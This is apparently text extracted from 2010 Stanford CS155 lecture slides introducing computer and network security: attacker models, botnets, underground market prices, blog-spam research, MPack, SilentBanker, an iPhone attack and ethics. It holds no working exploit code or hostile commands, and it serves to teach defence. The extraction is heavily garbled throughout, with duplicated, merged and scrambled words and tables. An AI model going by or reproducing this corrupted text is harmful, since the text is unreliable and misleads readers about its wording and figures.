WIXLIB

CS 155Spring 2010Computer andNetwork SecurityDan Boneh and John /CS155

Wht’ thib t?What’sthis course about?Introt o to cocomputerpute aandd networket o secusecuritytySome challenging fun projects Learn about attacksLearn about preventing attacksLectures on related topics ApplicationAli ti andd operatingti systemtsecurityitWeb securityNetwork securitySome overlap with CS241, Web SecurityNot a course on Cryptography (take CS255)

Oi tiOrganizationApplication and OS security (5 lectures) Buffer overflow projectVulnerabilities: control hijacking attacks, fuzzingPrevention: System design, robust coding, isolationW b securityWebi (4 lectures)l) Web site attack and defenses projectBrowser policies, session mgmt, user authenticationHTTPS andd webb applicationli ti securityitNetwork security (6 lectures) Network traceroute and packet filtering projectP iontiMalware, botnets, DDoS, network security testingA few other topics CryptographyCth (user(perspective),ti ) digitaldi it l rightsi ht management,tfinal guest lecture,

GfGenerall course iinfo((see web)b)Prerequisite: Operating systems (CS140)Textbook: none – reading onlineCoursework 3 projects, 2 homeworks, final examgrade:gade 0.250 5 H 0.50 5 P 0.250 5FTeaching assistants Harinyy Murli,, Hristo BojinovjOccasional optional section Experimentpthis year:yLive Meetingg

Whit ?Whatt iis security?System correctness If user supplies expected input, system generatesdesired outputSecurity If attacker supplies unexpected input, system doesnot failf il ini certaini ways

Whit ?Whatt iis security?System correctness Good input Good outputSecurity Bad input Bad output

Whit ?Whatt iis security?System correctness More features: betterSecurity More features: can be worse

Sit propertiestiSecurityConfidentiality Information about system or its users cannot belearned by an attackerIntegrity The system continues to operate properly, onlyreachinghi states thath wouldld occur if therehwere noattackerAvailability Actions by an attacker do not prevent users fromhavingg access to use of the systemy

General pictureSystemAliceAttackerSecurity is about Honest user (e.g., Alice, Bob, )Dishonest AttackerHow the Attacker Disrupts honesthuser’s’ use off theh system (Integrity,(Availability)l bl ) Learns information intended for Alice only (Confidentiality)

Network securityyNetwork AttackerS tSystemAliceIntercepts andcontrols networkcommunication

Web securityySystemyWeb AttackerSets up malicioussite visited byvictim; no controlof networkAlice

Operatingpg systemysecurityyOS AttackerControls maliciousfiles andapplicationsAlice

SystemAliceAttackerConfidentiality: Attacker does not learn Alice’s secretsIntegrity: Attacker does not undetectably corrupt system’s function for AliceAvailability: Attacker does not keep system from being useful to Alice

CCurrenttTTrendsd

Hit i lhkHistoricalhackers(prior to 2000)Profile: MaleBetween 14 and 34 yyears of agegComputer addictedNo permanent girlfriendNo Commercial Interest !!!Source: Raimund Genes

Typical Botherder: 0x800x80"(pronounced X-eighty)X eighty)Washington Post: Invasion of the Computer SnatchersHigh school dropout “ most of these people I infect are so stupid they really ain't got nobusiness being on the Internet in the first place.“Working hours: approx. 2 minutes/day to manage BotnetMonthly earnings: 6,800 on averageDaily Activities: Chatting with people while his bots make him moneyRecently paid 800 for an hour alone in a VIP room with several dancersJob Description: Controls 13,000 ,computerspin more than 20 countriesInfected Bot PCs download Adware then search for new victim PCsAdware displays ads and mines data on victim's online browsing habits.Bots collect ppassword,, e-mail address,, SS#,, credit and bankingg dataGets paid by companies like TopConverting.com, GammaCash.com,Loudcash, or 180Solutions.17

SSome thithings iin ththe newsNigerian letter (419 Scams) still works: Michigan Treasurer Sends 1.2MUSD of State Funds !!!Many zero-day attacks Google, Excel, Word, Powerpoint, Office Criminal access to important devices Numerous lost, stolen laptops, storage media, containingcustomer informationSecond-hand computersp(hard(drives)) posepriskVint Cerf estimates ¼ of PCs on Internet are bots18

Texas CISO, Feb 2010Td ffor 2010TrendsMalware, worms, and Trojan horses spread by email, instant messaging, malicious or infected websitesBotnets and zombies improving their encryption capabilities, more difficult to detectScareware – fake/rogue security softwareAttacks on client-side software browsers,, media players,p y , PDF readers,, etc.Ransom attacks malware encrypts hard drives, or DDOS attackSocial network attacks Users’ trust in online friends makes these networks a prime target.Cloud Computing - growing use will make this a prime target for attack.Web Applications - developed with inadequate security controlsBudget cuts - problem for security personnel and a boon to cyber criminals.Same list in Oklahoma Monthly Security Tips Newsletter

T endsTrends

Operating systemvulnerabilitieslne abilities

Reported Web Vulnerabilities "In the Wild"Data from aggregator and validator of NVD-reported vulnerabilities

Web vss SSystemstem vulnerabilitieslne abilitiesXSS peak

Botnet LifecyclePropagationp g Compromised host activityNetwork probe and other activityRecognizable activity on newly infected host

RRecentworkk on malwareldistributiondi ib i Blogsg are widelyy used- Blogs have automated Linkbacks- 184 Million blogs world-wide73% of internet users have read a blog50% post commentsFacilitate cross-referencingE l it d byExploitedb spammersWe carried out a 1-year study-Analyzed 10 million spam samplesGained insight on attacker’s method of operation and resourcesPropose a defense against blog spams

Ho big is the problem?Howp oblem?Source: Akismet.comOne blog spam canreach thousand ofusers

Hbl EitHoneyblogExperimentBlog acting as potential target for spamming Hosted a real blog (dotclear) with a modifiedTrackBack mechanismRecord TrackBacksPassive fingerprintingSSamplel theh lurelsitei

Mal a e installationMalware– TrojanDownloader:Win32/Zlob.gen!dll– Trojan.Popuper.originjp pg– Downloader.Zlob.LI

Tkb k spam examplelTrackbackApparent Bayesian poisoning against spamfilters:[title] Please teacher hentai pics[url] ex.html/[excerpt] pics Please teacher hentai pics.[blog name] Please teacher hentai pics

N b off notificationsNumbertifi tiddetectedt t dMayMar-AprMar-AprMay-Jun July 2007-Apr 2008JunJulyy 2007-Aprp 200820072007 20072007

N mbe of IP AddNumberAddressesessesMar-AprMayMay-Jun July 2007-Apr 2008Mar-Aprp 20082007 Jun2007 Julyy 2007-Apr20072007

OriginMar-Apr 2007R iRussiaJuly 2007Apr 2008May-Jun 2007USAGGermanyUK

User agents reported to honeyblogMarMar-AprMayMay-JunJul July2007-Apr200820082007-AprApr2007 Jun20072007 2007

Web attack toolkit: MPackBasic setupp Toolkit hosted on web serverInfects pages on that serverPage visitors get infectedFeatures Customized: determinesexploit on the fly, based onuser’ss OSuserOS, browser,browser etcEasy to use: managementconsole provides stats oninfection ratesCCustomercare toolkitlki can bebpurchased with one-yearsupport contract!34

SilentBankerProxyy interceptsprequest and addsfieldsBank sends loginpage needed tolog inWhen user submitsinformation, also sentto attackerCredit: Zulfikar Ramzan

E t i networkEstonia:tk attacktt kJaak Aaviksoo, Minister of Defence

Steal carsith a llaptoptwithNEW YORK - Security technology createdto protect luxury vehicles may now make iteasier for tech-savy thieves to drive awaywith them.In April ‘0707, highhigh-techtech criminals madeinternational headlines when they used alaptop and transmitter to open the locksand start the ignition of an armor-platedBMW X5 belongingb li tot soccer playerlDavidD idBeckham, the second X5 stolen from himusing this technology within six months. Beckham's BMW X5s were stolen byythieves who hacked into the codes for thevehicles' RFID chips 3

3

iPhone attack((summer 2007)iPhone Safari downloads malicious web page Arbitrary code is run with administrative privilegesCan read SMS log,g, address book,, call history,y,other dataCan perform physical actions on the phone. systemtsoundd andd vibrateib t theth phonehforf a secondd could dial phone numbers, send text messages, or recordaudio (as a bugging device) Transmit collected data over network to attackerSee http://www.securityevaluators.com/iphone/3

iPhit measuresiPhone security“Reduced attack surface” Stripped down and customized version of Mac OS X does not have common binaries such as bash, ssh, or even ls. MobileSafari - many features of Safari have been removed No Flash plug-in, many file types cannot be downloadedSome internal protection If USB syncing with iTunes, file system cannot be mountedFil systemFiletaccessibleibl tto iTiTunes iis chroot’edh t’ dWeak security architecture All processes of interest run with administrative privilegesiPhiPhoneddoes nott utilizetili some widelyid l acceptedt d practicesti Address randomizationEach time a process runs, the stack, heap, and executablecode located at precisely the same spot in memory Non-executable heaps Buffer overflow on heap can write executable instructions 4

Al i methodsth dAnalysisExtract and statically analyze binaries Using jailbreak and iPhoneInterface,Audit related open-source code MobileSafarif and MobileMail applications are basedon the open source WebKit projectDynamic analysis, or “fuzzing”fuzzing Sending malformed data to cause a fault or crashLook at error messages, memory dump, etc.M bil S f i attackMobileSafaritt k discovereddid usingi fuzzingf i What kind of vulnerability do you think it was?4

Stiffor iimprovementtSuggestionsRun applicationsppas an unprivilegedpg user This would result in a successful attacker only gaining therights of this unprivileged user.chroot appspp to preventpaccess to unrelated data MobileSafari does not need access to email or SMS msgsMobileMail deos not need access to browsing historyAdd heapp and stack address randomization This will serve to make the development of exploits forvulnerabilities more difficultMemoryy pprotection: no pagesp g both writable andexecutableSee giphone.pdf4

Spam serviceRent-a-botCash-outPumpp and dumppBotnet rental4

U dUndergroundd goodsd andd servicesiRank Last Goods and services Current PreviousPrices12Bank accounts22%21% 10-100021Credit cards13%22% 0.40- 2037Full identity9%6% 1-15 1154N/ROnline auction siteaccounts7%N/A 1-858Scams7%6% 2.50/wk/- 50/wk/(hosting); 25 design64Mailers6%8% 1-1075Email Addresses5%6% 0.83- 10/MB 83Email Passwords5%8% 4-309N/RDrop (request or offer)5%N/A10-50% of drop amount106Proxies5%6% 1 50 30 1.50- 30Credit: Zulfikar Ramzan

Whhi vulnerabilities?lbili i ?Why are theresecurityLots of buggyggy software. Why do programmers write insecure code?Awareness is the main issueSome contributing factors Few courses in computer securityProgramming text books do not emphasize securityFew security auditsC is an unsafe languageProgrammers have many other things to worry aboutLegacy software (some solutions, e.g. Sandboxing)Consumers do not care about securitySecurity is expensive and takes time

If you remember only one thing from this course:A vulnerability that is “tootoo complicated foranyone to ever find” will be found !We hope you remember more than one thing

Ethiit iinformationftiEthicall use off securityWe discuss vulnerabilities and attacks Most vulnerabilities have been fixedSome attacks mayy still cause harmDo not try these at home or anyplace elsePurpose of this class Learn to prevent malicious attacksUse knowledge for good purposes

LLaw enforcementftSean Smith Melissa virus: 5 years in prison, 150K fineEhud Tenenbaum ((“TheThe AnalyzerAnalyzer”)) Broke into US DoD computers6 mos service, suspended prison, 18K fineDmitry Sklyarov Broke Adobe ebooksProsecuted under DMCA